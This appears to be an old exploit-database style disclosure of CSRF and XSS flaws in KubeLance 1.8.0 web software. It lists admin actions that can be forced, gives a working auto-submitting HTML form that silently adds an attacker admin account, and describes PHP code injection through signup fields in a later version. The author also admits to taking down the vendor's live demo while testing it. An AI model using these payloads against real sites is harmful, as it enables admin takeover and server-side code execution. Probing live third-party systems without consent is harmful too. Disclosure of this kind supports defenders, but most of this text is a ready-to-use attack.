KubeLance version 1.8.0 suffers from cross site request forgery and cross site scripting vulnerabilities.
51dcf4384325da76c8289360ea5b3b8ef3f382dde1c945067852c350f0657760
===========================================================
Vulnerable Software: KubeLance: 1.8.0
Official Site: kubelabs.com
===========================================================
Vuln Desc:
KubeLance: 1.8.0 suffers from multiple CSRF and XSS+HTML injection vulns.
Below i'll show to you ONLY CSRF exploitation but mixing it with XSS payload possible and exploitable.
(For exploitate CSRF+XSS simply change forms and corresponding values to XSS payload thats all)
===========================================================
Using CSRF vuln in this situation:
Possible #1:
forcing admin to logout:
http://demos.kubelabs.com/kubelance/adm/logout.php
Possible #2:
To change admin user name+password:
adm/admin_edit.php?id=1
Possible #3:
Clear logs:
/adm/log_viewer.php?clear=1
etc.
===========================================================
/*Will affect*/
If Currently logged admin visits crafted page which contains POC code.
Will ve Pwned ASAP.
===========================================================
Demo: http://demos.kubelabs.com/kubelance/
Just one POC:
============================== BEGIN OF PROOF OF CONCEPT EXPLOIT ===================================
<html>
<head>
<title>KubeLance: 1.8.0 CSRF exploitation POC</title>
</head>
<p>KubeLance: 1.8.0 CSRF CSRF ADD ADMIN POC</p>
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://CHANGE_TO_RTARGET/kubelance/adm/admin_add.php">
<input name="username" type="hidden" class="textbox" id="username" style="width:60%" value="me">
<input name="password" type="hidden" class="textbox" id="password" style="width:60%" value="me">
</form>
<!-- Username:me -->
<!-- Password:me -->
</body>
</html>
============================== END OF PROOF OF CONCEPT EXPLOIT===================================
Note1: Maybe previous versions also affected but not tested by me.
Note2:
In wild: I found site which uses Kubelance CMS which's *includes/config.php* says it is:
$config['version'] = '2.0';
6149742 -rw-r--r-- 1 ************** apache 2854 Apr 9 2010 config.php
Version 2 (But i can't find that exact version on vendor site)
Just note: That version ($config['version'] = '2.0';) is prone to PHP CODE Execution
(While signup First name and Last name sections(inputboxes) can be injected with PHP CODE
in eg:
<?php phpinfo();?>
On submit this gives error and as result PHP code executes on server side:
http://s019.radikal.ru/i618/1203/14/0ab995b456cd.png
Beaware: Anyone who uses that version:Update your software ASAP and check your site for backdoors,change all your configs,cpanel,ftp passwords,
email passwords and never use same passwords everywhere.
My Apogolises Kubelance Guys:
While testing it online (http://demos.kubelabs.com/kubelance/) i down'ed it mistakely:D
Sorry 1000 times for this:(
Peace
/AkaStep ^_^